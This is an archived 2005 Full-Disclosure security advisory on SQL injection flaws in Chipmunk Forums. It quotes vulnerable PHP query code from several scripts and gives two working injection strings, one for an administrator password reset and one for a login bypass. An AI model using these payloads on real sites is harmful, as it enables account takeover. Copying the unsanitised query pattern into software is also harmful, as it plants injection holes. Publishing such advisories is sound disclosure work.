[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Multiple SQL injection in Chipmunk forum

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: [Full-Disclosure] Multiple SQL injection in Chipmunk forum
From: "GHC vision" <foster@xxxxxx>
Date: Sat, 5 Feb 2005 20:32:35 +0200

All information is in attached file.

[====================]

<img src="http://www.ghc.ru/images/logo.jpg";>

/*==========================================*/
// GHC Chipmunk forum ADVISORY
// Product: Chipmunk Forums
// URL: http://www.chipmunk-scripts.com/board
// VULNERABILITY CLASS: SQL injection
// RISK: hight
/*==========================================*/

[1] script name: getpassword.php

---[code]---
if(isset($_POST['submit']))
{
  $email=$_POST['email'];
  $getinfo="SELECT * from b_users where email='$email'";
  ...
mail("$email","Your Forum password","Your forum password has been set to 
$value");
---[/code]---

[exploit]
ghc@xxxxxx' or username='Administrator
this action will change password for Administrator without notification

[note]
"Administrator" must be a valid user name.

[2] script name: authenticate.php

---[code]---
$username=$_POST['user'];
$password=$_POST['password'];
$password=md5($password);
$query = "select * from b_users where username='$username' and 
password='$password' and 
validated='1'"; 
---[/code]---

[exploit]
at login.php enter user name as
Administrator'/*

[3] script name: edit.php

---[code]---
 if(isset($_POST['ID']))
{
  $ID=$_POST['ID'];
}
else
{
  $ID=$_GET['ID'];
}
$checking="SELECT * from b_posts,b_users where b_users.userID=b_posts.author 
and 
b_posts.ID='$ID'";
---[code]---

Possible SQL injection through $ID variable.

[4] search.php

---[code]---
  $searchterm=$_POST['searchterm'];
  $getthreads="SELECT * from b_posts where  post like '%$searchterm%' and 
threadparent='0' 
order by telapsed DESC limit $start, 50";
---[/code]---

Possible SQL injection through $searchterm.

[5] newtopic.php

---[code]---
       $name=$_POST['name'];
       $title=$_POST['title'];
       $post=$_POST['post'];
       $day=date("D M d, Y H:i:s");
       $timegone=date("U") ;
       if($_POST['nosmiley'])
...
       $name=strip_tags($name);
       $title=strip_tags($title);       
       $post=strip_tags($post);              
       $posting="INSERT INTO b_posts (author, title, post,timepost, telapsed, 
postforum,lastpost,nosmilies,ipaddress) values ('$name', '$title', '$post', 
'$day', 
'$timegone','$forumID','$user','$nosmiley','$s')";
       mysql_query($posting) or die("could not post");
---[/code]---

Possible SQL injection  through $name, $title, $post.

[6] reguser.php 

---[code 1]---
$username=$_POST['username'];
$password=$_POST['password'];
$signature=$_POST['signature'];
$pass2=$_POST['pass2'];
$usercheck="SELECT*from b_users where username='$username' or email='$email'";

---[code 2]---

if ($password==$pass2 && $_POST['password'])
{
  $password=md5($password);
  $supervalue=$value;
  $daycte("U");
  $email=$_POST['email'];
  $location=$_POST['location'];
  $aim=$_POST['aim'];
  $showprofile=$_POST['showprofile'];
  $icq=$_POST['icq'];
  $seedval=$day0000;
  srand($seedval);
  $key=RAND(1000000,2000000);
  if($requirekey=="no"||$requirekey=="No") //if you do no require an activation 
key
  {
    $SQL ="INSERT into b_users (username,password,sig, 
email,location,AIM,ICQ,showprofile,validated) values
('$username','$password','$signature','$email','$location','$aim','$icq','$showprofile','1')
";
    mysql_query($SQL) or die(mysql_error());
  }
  else //you require an activation key
  {
    $SQL ="INSERT into b_users (username,password,sig, 
keynode,email,location,AIM,ICQ,showprofile) values
('$username','$password','$signature','$key','$email','$location','$aim','$icq','$showprofil
e')";
    mysql_query($SQL) or die(mysql_error());
    mail("$email","Your forum activation key","Paste the URL to activate your 
account.  
$boardpath/activate.php?username=$username&password=$password&keynode=$key");
  }
---[/code]---

Possible SQL injection thrue registration form's variables.

Find a lot of bugs in usercp.php, reply.php, quote.php and others by yourself.

/* ================================================== */
/* www.ghc.ru -- security games & challenges          */
/* ================================================== */
/* greets to: RST.void.ru, D0G4 & all quest hunters %)*/
/* ================================================== */

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: [Full-Disclosure] Re: Operator Shell (osh) BSS-based Buffer Overflow
Next by Date: [Full-Disclosure] CMScore advisory
Previous by thread: [Full-Disclosure] Re: Operator Shell (osh) BSS-based Buffer Overflow
Next by thread: [Full-Disclosure] CMScore advisory
Index(es):
- Date
- Thread